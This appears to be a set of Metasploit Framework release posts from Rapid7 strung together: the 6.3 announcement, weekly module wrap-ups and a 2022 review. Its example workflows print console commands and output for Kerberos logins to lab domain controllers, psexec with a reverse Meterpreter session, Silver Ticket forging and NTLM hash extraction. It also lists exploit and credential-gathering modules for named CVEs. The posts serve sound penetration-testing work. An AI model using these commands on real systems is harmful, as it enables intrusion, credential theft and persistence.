MSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. AD DS modules include:
auxiliary/admin/ldap/rbcd, which lets users configure an object in Active Directory to permit another object to impersonate any other account
auxiliary/gather/ldap_query, which allows for remote LDAP server queries, including custom and group queries
In recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:
Additional features and improvements since Metasploit 6.2 include:
A sixth getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM ("EfsPotato")
Updated show optionssupport that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)
Example workflows
Below are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the Metasploit docs site. This documentation is open-source, and contributions are welcome.
Kerberos Service Authentication
Opening a WinRM session:
msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 1...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>
Querying LDAP for accounts:
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================
Name Attributes
---- ----------
badpwdcount 0
pwdlastset 133184302034979121
samaccountname Administrator
useraccountcontrol 512
... etc ...
Running PsExec against a host:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
meterpreter >
Connecting to a Microsoft SQL Server instance and running a query:
When running Metasploit with a database, all Kerberos tickets will be persisted into the database. The klist command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:
The klist command also supports the -v flag for showing additional detail.
Requesting tickets
The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. For instance the following example will request a TGS impersonating the Administrator account:
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24
[*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local)
[+] 10.0.0.24:88 - Received a valid TGT-Response
[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] 10.0.0.24:88 - Received a valid TGS-Response
[+] 10.0.0.24:88 - Received a valid TGS-Response
[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed
The auxiliary/admin/kerberos/get_ticket module also supports authentication via PKINIT with the CERT_FILE and CERT_PASSWORD options. When used with the GET_HASH action, a user-to-user (U2U) authentication TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.
msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx
[*] Running module against 192.168.159.10
[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin
[*] 192.168.159.10:88 - Getting NTLM hash for [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) >
Forging tickets
After compromising a KDC or service account, users can forge Kerberos tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:
msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local
[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
[*] Auxiliary module execution completed
Kerberos debugging support
Metasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.
The new auxiliary/admin/kerberos/inspect_ticket module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the auxiliary/gather/windows_secrets_dump module or similar:
msf6 > use auxiliary/admin/kerberos/inspect_ticket
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: [email protected]
Ccache version: 4
Creds: 1
Credential[0]:
Server: cifs/[email protected]
Client: [email protected]
Ticket etype: 18 (AES256)
Key: 3436643936633032656264663030393931323461366635653364393932613763
Ticket Length: 978
Subkey: false
Addresses: 0
Authdatas: 0
Times:
Auth time: 2022-11-21 13:52:00 +0000
Start time: 2022-11-21 13:52:00 +0000
End time: 2032-11-18 13:52:00 +0000
Renew Till: 2032-11-18 13:52:00 +0000
Ticket:
Ticket Version Number: 5
Realm: WINDOMAIN.LOCAL
Server Name: cifs/dc.windomain.local
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
Times:
Auth time: 2022-11-21 13:52:00 UTC
Start time: 2022-11-21 13:52:00 UTC
End time: 2032-11-18 13:52:00 UTC
Renew Till: 2032-11-18 13:52:00 UTC
Client Addresses: 0
Transited: tr_type: 0, Contents: ""
Client Name: 'Administrator'
Client Realm: 'WINDOMAIN.LOCAL'
Ticket etype: 18 (AES256)
Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
PAC:
Validation Info:
Logon Time: 2022-11-21 13:52:00 +0000
Logoff Time: Never Expires (inf)
Kick Off Time: Never Expires (inf)
Password Last Set: No Time Set (0)
Password Can Change: No Time Set (0)
Password Must Change: Never Expires (inf)
Logon Count: 0
Bad Password Count: 0
User ID: 500
Primary Group ID: 513
User Flags: 0
User Session Key: 00000000000000000000000000000000
User Account Control: 528
Sub Auth Status: 0
Last Successful Interactive Logon: No Time Set (0)
Last Failed Interactive Logon: No Time Set (0)
Failed Interactive Logon Count: 0
SID Count: 0
Resource Group Count: 0
Group Count: 5
Group IDs:
Relative ID: 513, Attributes: 7
Relative ID: 512, Attributes: 7
Relative ID: 520, Attributes: 7
Relative ID: 518, Attributes: 7
Relative ID: 519, Attributes: 7
Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
Effective Name: 'Administrator'
Full Name: ''
Logon Script: ''
Profile Path: ''
Home Directory: ''
Home Directory Drive: ''
Logon Server: ''
Logon Domain Name: 'WINDOMAIN.LOCAL'
Client Info:
Name: 'Administrator'
Client ID: 2022-11-21 13:52:00 +0000
Pac Server Checksum:
Signature: 04e5ab061c7a909a26b122c2
Pac Privilege Server Checksum:
Signature: 710bb183858257f41021bd7e
Metasploit has also added first-class support for the Keytab file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.
For instance, if Metasploit’s database is configured when running the secretsdump module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit’s database:
Once the new Keytab file is created, modify Wireshark to use the exported encryption keys in Edit -> Preferences -> Protocols -> KRB5, and select try to decrypt Kerberos blobs. Now Wireshark will automatically try to decrypt Kerberos blobs — the blue highlighted lines show Wireshark’s decryption working:
Certifried privilege escalation
Metasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried (CVE-2022–26923) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.
Updated show options support
Previous to Metasploit 6.3 the show options and show advanced commands would display a module’s supported options in a single list.
Now module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting to them to the user:
Get it
Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.
New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.
Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.
Thanks to community contributor Erik Wynter, Metasploit Framework now has an exploit module for an unauthenticated command injection vulnerability in the Cacti network-monitoring software. The vulnerability is due to a proc_open() call that accepts unsanitized user input in remote_agent.php. Provided that the target server has data that’s tied to the POLLER_ACTION_SCRIPT_PHP action, the vulnerable proc_open() call can be reached with a single GET request. Successful exploitation will result in a session as the user running the Cacti server.
Python Meterpreter Gets a Few Upgrades
The latest release includes some improvements to Python Meterpreter which gets the payload a little closer to feature parity with Windows Meterpreter. For Windows Python Meterpreter, NtAlexio2added the enumdesktops command, which like with Windows Meterpreter, enumerates all of the accessible desktops it can find. Our very own zeroSteiner added dual stack IPv4 / IPv6 TCP support for Python Meterpreter. Working across both Windows and Linux, this improvement enables Python Meterpreter to listen on all interfaces it can listen on, including ones that have IPv6 addresses.
New module content (1)
Cacti 1.2.22 unauthenticated command injection
Authors: Erik Wynter, Owen Gong, Stefan Schiller, and Steven Seeley
Type: Exploit
Pull request: #17407 contributed by ErikWynter
AttackerKB reference: CVE-2022-46169
Description: This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
Enhancements and features (3)
#17340 from zeroSteiner – The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
#17518 from zeroSteiner – A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
#17519 from jmartin-r7 – Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
Bugs fixed (2)
#17516 from zeroSteiner – The version of Metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
#17525 from adfoster-r7 – Fixes a deprecation warning when using socks proxy support in Metasploit.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Have an idea on how to expand on Metasploit Documentation on https://docs.metasploit.com/? Did you see a typo or some other error on the docs site? Thanks to adfoster-r7, submitting an update to the documentation is as easy as clicking the ‘Edit this page on GitHub’ link on the page you want to change. The new link will take you directly to the source in Metasploit’s GitHub so you can quickly locate the Markdown and submit a PR.
New module content (3)
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit
Author: Krzysztof Burghardt
Type: Auxiliary
Pull request: #17348 contributed by burghardt
AttackerKB reference: CVE-2022-46770
Description: This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
WordPress Paid Membership Pro code Unauthenticated SQLi
Authors: Joshua Martinelle and h00die
Type: Auxiliary
Pull request: #17479 contributed by h00die
AttackerKB reference: CVE-2023-23488
Description: This adds an exploit module that leverages an unauthenticated SQLi against WordPress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves WordPress usernames and password hashes using Time-Based Blind SQL Injection technique.
Authors: Jakub Kramarz and h00die-gr3y
Type: Exploit
Pull request: #17449 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-44529
Description: A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
Enhancements and features (5)
#17343 from h00die – This makes performance improvements to the windows/local/unquoted_service_path module.
#17451 from h00die – This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
#17466 from prabhatjoshi321 – This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
#17473 from adfoster-r7 – Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
#17480 from h00die – A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
Bugs fixed (3)
#17385 from smashery – This fixes the file write and file append methods to return the expected Boolean values rather than nil.
#17482 from adfoster-r7 – Fixes a connection issue with reverse_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
#17491 from zeroSteiner – A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Author: Kali-Team
Type: Post
Pull request: #17337 contributed by cn-kali-team
Description: This adds a post exploit module that retrieves Dbeaver session data from local configuration files. It is able to extract and decrypt credentials stored in these files for any version of Dbeaver installed on Windows or Linux/Unix systems.
Gather MinIO Client Key
Author: Kali-Team
Type: Post
Pull request: #17341 contributed by cn-kali-team
Description: This adds a post module that gathers local credentials stored by the MinIO client on Windows, Linux, and MacOS.
Enhancements and features (2)
#17427 from gwillcox-r7 – This adds YARD documentation to the LDAP libraries for developers to reference.
#17447 from gwillcox-r7 – We now utilize ‘pry’ dependencies with support for newer Ruby versions.
Bugs fixed (3)
#17386 from smashery – A bug has been fixed whereby the HTTP library was parsing HTTP HEAD requests like GET requests, which was causing issues due to lack of compliance to RFC9110 standards. By updating the code to be more compliant with these standards, modules such as auxiliary/scanner/http/http_header now work as expected.
#17438 from ErikWynter – This fixes an issue in the exchange_proxylogon_collector module where it would crash if the LegacyDN was not present in the XML response.
#17454 from prabhatjoshi321 – A bug has been fixed whereby smb_enumshares incorrectly truncated file names before storing them into loot. This has been addressed so that only the console output will contain truncated file names, and the loot files will still contain the full file names for reference.
Documentation added (1)
#17395 from cgranleese-r7 – Adds documentation for both the JSON and MessagePack Metasploit RPC APIs – which is useful for programmatically interacting with Metasploit.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Thankfully, it was a relatively quiet holiday break for security this year, so we hope everyone had a relaxing time while they could. This wrapup covers the last three Metasploit releases, and contains three new modules, two updates, and five bug fixes.
Make sure that your OpenTSDB isn’t too open
Of particular note in this release is a new module from community contributors Erik Wynter and Shai rod
which adds a new exploit module for CVE-2020-35476, an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB <= 2.4.0.
OpenTSDB is a monitoring software that runs on top of Hadoop and HBase to allow users to serve large amounts of time-series data without losing any granularity in the data itself. If you are wondering what that host mess of buzzwords means, it simply means that it is a database optimized to store events or measurements that are time-stamped. This also means that the target is likely to be storing a lot of metrics data, which may also include sensitive internal operations, making it a prime target for exploitation.
Successful exploitation of this vulnerability will result in remote code execution as the root user, meaning that an attacker can go from being completely unauthenticated to having full control over affected OpenTSDB devices. This could then allow the attacker
to pivot further into the target network, using either the privileges they have gained on the OpenTSDB device, or details from the logs on the OpenTSDB device, which may provide insight into weaknesses of the network or give access to sensitive information.
New module content (3)
Linear eMerge E3-Series Access Controller Command Injection by Gjoko Krstic (gjoko[at]applied-risk.com) and h00die-gr3y, which exploits CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions 1.00-06 and below in the No and door parameters of card_scan_decoder.php. Successful exploitation results in RCE as the root user.
#17258 from h00die – This updates the SharpHound post module to use version 1.1.0 of SharpHound, which works with Bloodhound 4. This includes both the .ps1 and binary from the original repository.
#17380 from smashery – The list of user agent strings inside lib/rex/user_agent.rb has been updated to reflect the latest user agents as of December 2022.
Bugs fixed (5)
#17334 from bcoles – Multiple improvements to modules/post/linux/gather/enum_commands, including fixing a crash when attempting to search a path that doesn’t exist
#17389 from ErikWynter – log4shell_header_injection bugfix to prevent NoMethodError for nil:NilClass
#17409 from adfoster-r7 – Update rhost walker to handle interrupt signal
#17416 from MegaManSec – The jenkins_gather.rb module has been updated to use .blank? instead of .empty? when handling SSH Key details to prevent crashes should the various elements of the SSH Key be empty or nil.
#17435 from jmartin-r7 – A bug has been fixed whereby some modules were accidentally updated to use smtp_send_recv when they did not import the required Exploit::Remote::SMTPDeliver mixin. These modules have been updated to use the appropriate raw_send_recv method instead.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
It’s been another gangbusters year for Metasploit, and the holidays are a time to give thanks to all the people that help make our load a little bit lighter. So, while this end-of-year wrap-up is a highlight reel of the headline features and extensions that landed in Metasploit-land in 2022, we also want to express our gratitude and appreciation for our stellar community of contributors, maintainers, and users. The Metasploit team merged 824 pull requests across Metasploit-related projects in 2022, more than 650 of which were incorporated into the main metasploit-framework repository. If you fixed a typo, linked a new reference, or cleaned up some code spaghetti, thank you!
Active Directory Certificate Services attacks
For years now, penetration testers and attackers have emphasized Active Directory as a particularly juicy and valuable attack surface area. In 2021, we saw fresh attack research that outlined new techniques for targeting Active Directory Certificate Services, or AD CS, including multiple configuration flaws that can be leveraged to escalate permissions from a domain user to a privileged account. In response to requests from our user community, Metasploit released two modules in the second half of 2022 that support AD CS attack techniques:
auxiliary/gather/ldap_esc_vulnerable_cert_finder can be used by an authenticated AD user to enumerate Certificate Authorities (CAs) and find vulnerable certificate templates.
auxiliary/admin/dcerpc/icpr_cert allows users to issue certificates from AD CS with a few options that are used for exploiting some escalation (ESC) scenarios. Currently only escalation technique 1 (ESC1) can be exploited with the available options, but support for more techniques is planned.
Linux credential extraction with Mimipenguin
Metasploit expanded our post-exploitation capabilities for extracting plaintext credentials on Linux systems by porting the Mimipenguin utility to Metasploit. This allows users to extract credentials for a variety of services from an established Meterpreter session, including the gnome-keyring-daemon, vsftpd and sshd. Under the hood, this functionality uses a new Meterpreter API that allows searching through process memory.
Metasploit plays well with others
This year Metasploit added a few different ways of supporting interoperability with other offensive security tools. First up is the BOF Loader for COFF files, which enables usage of Cobalt Strike’s Beacon Object File format from within the Windows Meterpreter. This extension can also use BOF files written for Sliver. We’ve also made an improvement this year to allow users to bring their own payloads and stages from other tools and formats. If you’re a Sliver user, you can now deploy a Sliver agent as a custom payload stage, and we will use our own Metasploit stagers to upload and run the custom shellcode on the target.
Holiday hacking challenge
Metasploit teamed up with TryHackMe to deliver a challenge as part of their Advent of Cyber event, which ran for the month of December. The Metasploit challenge debuted on December 9 and walked users through a fun Christmas-themed story where they were able to use some of Metasploit’s latest pivoting capabilities. A walk-through is available under Task 9 on the official event page.
Sixth getsystem technique
Metasploit added a new technique to everyone’s favorite Meterpreter command in the middle of 2022 with help from cdelafuente-r7, who incorporated the newest named-pipe impersonation-based technique (the EfsPotato variant). This particular vulnerability affects Windows Vista / Server 2008 and later can be executed entirely in memory to escalate the current session to NT AUTHORITY\SYSTEM without spawning a new process. For more information about this and other getsystem techniques, check out the new module documentation. (Pro tip: Specific techniques can be used by number!)
Post API improvements and maintenance
Community member bcoles made more than 100 pull requests to improve and maintain the post-exploitation API used by Metasploit’s 400+ post modules. This enormous effort is greatly appreciated and has fixed numerous bugs, added new functionality, and made general improvements that benefit both end users and module developers alike. Among those improvements are removing quite a few lingering Meterpreter scripts (which were replaced by post modules in 2011) and adding shell session support for a few enumeration modules. The shell session support is particularly useful when combined with 2021’s payload-less session improvements because it bypasses the need to address evasion with Meterpreter.
New contributors
We would like to thank the community for all the work done this year. Particularly, we want to give a big shout out to the 45 new contributors that added great content to Metasploit. Some of these folks even added modules for celebrity vulnerabilities or flaws that were being actively exploited in the wild, such as Apache Spark RCE (CVE-2022-33891), Spring Cloud Gateway RCE (CVE-2022-22947) or Spring Framework RCE (CVE-2022-22965). We’re grateful to all our contributors for submitting modules that help organizations test their defenses, demonstrate risk, and prioritize mitigations.
exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 – Despite having a 2021 CVE, this particular vulnerability, contributed by community member h00die-gr3y, gained attention in 2022 for being an unauthenticated RCE in VMware’s NSX product. Being a deserialization vulnerability, exploitation is smooth and reliable.
auxiliary/gather/ldap_query – This new module allows users to gather useful information from an Active Directory Domain Services (AD DS) LDAP server. Metasploit currently includes 28 predefined queries for common actions like enumerating LAPS passwords, computer accounts, and users with configured Service Principal Names (SPNs) for Kerberoasting. Metasploit users can even define their own queries for use with the module.
exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc – This module, from community contributor h00die, added in support for CVE-2021-22015. vCenter is frequently targeted by attackers, so h00die’s contribution goes a long way in helping pen testers better assess the security of vCenter servers during their engagements.
exploit/linux/http/cisco_asax_sfr_rce – This module was added by jbaines-r7 and incorporated an exploit for CVE-2022-20828 that allows authenticated attackers to gain root-level shells on vulnerable Cisco ASA-X devices with FirePOWER Services enabled. These devices are frequently positioned in sensitive pivots within networks, and are prime targets for attackers, so gaining RCE on these devices often results in access to privileged networks and/or data.
exploit/multi/veritas/beagent_sha_auth_rce – This module from community contributor c0rs exploits CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent to bypass authentication and gain remote code execution as SYSTEM/root. This is quite a nice vulnerability since backup agents typically have access to sensitive information, so any compromise of such devices typically leads to access to sensitive company data. Combine this with SYSTEM/root privileges as an unauthenticated remote user, and you have a decent vulnerability for gaining initial access into a network and gaining information to start your pivoting attempts to other segments of that network.
Version 6.2 released
Over the summer, the Metasploit team announced the release of Metasploit Framework 6.2, which included a number of new features. Some of the highlights:
A streamlined authentication capturing plugin
An SMB 2 and 3-capable file server
Improved options for handling NATed services
Improved SMB relaying
We’re planning a 6.3 feature release in early 2023, so stay tuned for the next round of new Metasploit capabilities and improvements!
E-Z-2-contribute documentation
As of the 6.2 release, Metasploit has a new, user-contributable docs site at https://docs.metasploit.com/. Want to contribute to Metasploit, but don’t want to monkey around with Ruby or exploit code? We can always use more and better documentation on your favorite Metasploit features, workflows, and improvements. Get in there and help us teach people how hacking works!
From all of us at Rapid7, we wish you a very happy new year. As always, you can get the latest Metasploit updates every Friday in our weekly wrap-up, and you can stay up-to-date on vulnerability intelligence with AttackerKB.
A sack full of cheer from the Hacking Elves of Metasploit
It is clear that the Metasploit elves have been busy this season: Five new modules, six new enhancements, nine new bug fixes, and a partridge in a pear tree are headed out this week! (Partridge nor pear tree included.) In this sack of goodies, we have a gift that keeps on giving: Shelby’sAcronis TrueImage Privilege Escalation works wonderfully, even after the software is uninstalled.
If you prefer elf files to holiday elves, we’ve still got you covered
Jan Rude submitted two modules targeting Syncovery for Linux. One takes advantage of an insecure session token generator and allows for the brute-force creation of a token that matches that of a logged-in user, and the other allows an authenticated user to create a job that will run when a user’s profile is run.
New module content (5)
Syncovery For Linux Web-GUI Session Token Brute-Forcer by Jan Rude, which exploits CVE-2022-36536 – A new login scanner module that brute-forces a valid session token for the Syncovery File Sync & Backup Software Web-GUI. This will work if the default user is already logged in the application. If they do not logout, the token stays valid until the next reboot.
Acronis TrueImage XPC Privilege Escalation by Csaba Fitzl and Shelby Pace, which exploits CVE-2020-25736 – This module exploits a local privilege escalation vulnerability in Acronis TrueImage versions 2019 update 1 through 2021 update 1 on macOS. This vulnerability is identified as CVE-2020-25736. By abusing a local helper executable, it is possible to execute arbitrary commands as the root user.
Syncovery For Linux Web-GUI Authenticated Remote Command Execution by Jan Rude, which exploits CVE-2022-36534 – This adds a module that exploits an authenticated remote code execution vulnerability identified as CVE-2022-36534 in the Web GUI of Syncovery File Sync & Backup Software for Linux. The module leverages a flaw in the application that allows the creation of jobs that will be executed when a profile is run. This allows the execution of arbitrary commands as the root user.
#17191 from liangjs – This PR fixes a bug where the Windows Subsystem for Linux crashes when using a reverse_tcp x64 stager because of data in the upper bits of the RDI register when the syscall occurs.
#17255 from JustAnda7 – The command payloads have been updated to allow specifying the file system path for several of their commands within datastore options. This should allow users to specify these commands locations should they not be contained within the searchable PATH.
#17346 from adfoster-r7 – The logic for counting threads within lib/metasploit/framework/spec/threads/suite.rb has been updated to appropriately count and document the known threads that can be left behind when running the rspec test suite. This fixes an intermittent rspec crash.
#17355 from adfoster-r7 – The creds command has been updated to show the full SSH key contents when running the creds -v command or when exporting to a file with creds -o output.txt. Previously only a shortened fingerprint string would be shown to the user.
#17357 from adfoster-r7 – The docs site has been updated to support mermaid graphs for rendering diagrams to assist with explanations.
#17387 from smashery – The hosts, services, vulns and notes command have been updated to support tab expansion in paths using the ~ character when using the -o option to specify the path to the file to write the output to.
Bugs fixed (9)
#17345 from adfoster-r7 – A crash has been fixed when using the report API with verbose mode enabled and no active DB.
#17350 from smashery – This updates three UAC bypass modules to remove a hard coded delay in favor of using the module’s builtin cleanup method. This results in the user having access to the interactive session without needing to wait.
#17351 from smashery – This fixes an issue in the exploit/windows/local/s4u_persistence module where the default value for FREQUENCY would cause an error.
